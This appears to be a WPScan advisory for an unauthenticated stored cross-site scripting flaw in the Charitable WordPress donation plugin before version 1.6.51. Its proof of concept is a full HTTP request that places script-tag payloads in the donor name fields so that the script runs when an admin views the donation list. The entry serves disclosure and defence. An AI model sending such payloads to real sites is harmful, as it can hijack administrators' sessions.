WordPress Plugin Vulnerabilities
Charitable - Donation Plugin < 1.6.51 - Unauthenticated Stored Cross-Site Scripting
Description
While fixing an Authenticated Stored Cross-Site Scripting issue (https://wpscan.com/vulnerability/a5837621-ee6e-4876-9f65-82658fc0341f), the vendor identified another Cross-Site Scripting issue, which could be exploited by unauthenticated users and would be triggered in the context of a logged in admin
Proof of Concept
Submit (as unauth) a donation with <script>alert(/XSS/)</script> as First Name or Last Name, then view the donation lists as admin to trigger the XSS POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 501 Connection: close charitable_form_id=60f1bb21849de&60f1bb21849de=&_charitable_donation_nonce=dd32c048d6&_wp_http_referer=%2Fwordpress%2Fcampaigns%2Ftest%2Fdonate%2F&campaign_id=1148&description=Test&ID=0&gateway=offline&custom_donation_amount=1.00&first_name=test%22%3E%3Cscript%3Ealert(%2FXSS-FN%2F)%3C%2Fscript%3E&last_name=test%22%3E%3Cscript%3Ealert(%2FXSS-LN%2F)%3C%2Fscript%3E&email=fjrekhg%40nferhf.com&address=&address_2=&city=&state=&postcode=&country=AF&phone=&action=make_donation&form_action=make_donation
Affects Plugins
Fixed in 1.6.51 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Eric Daams
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-21 (about 2 years ago)
Added
2021-07-21 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)
WPScan 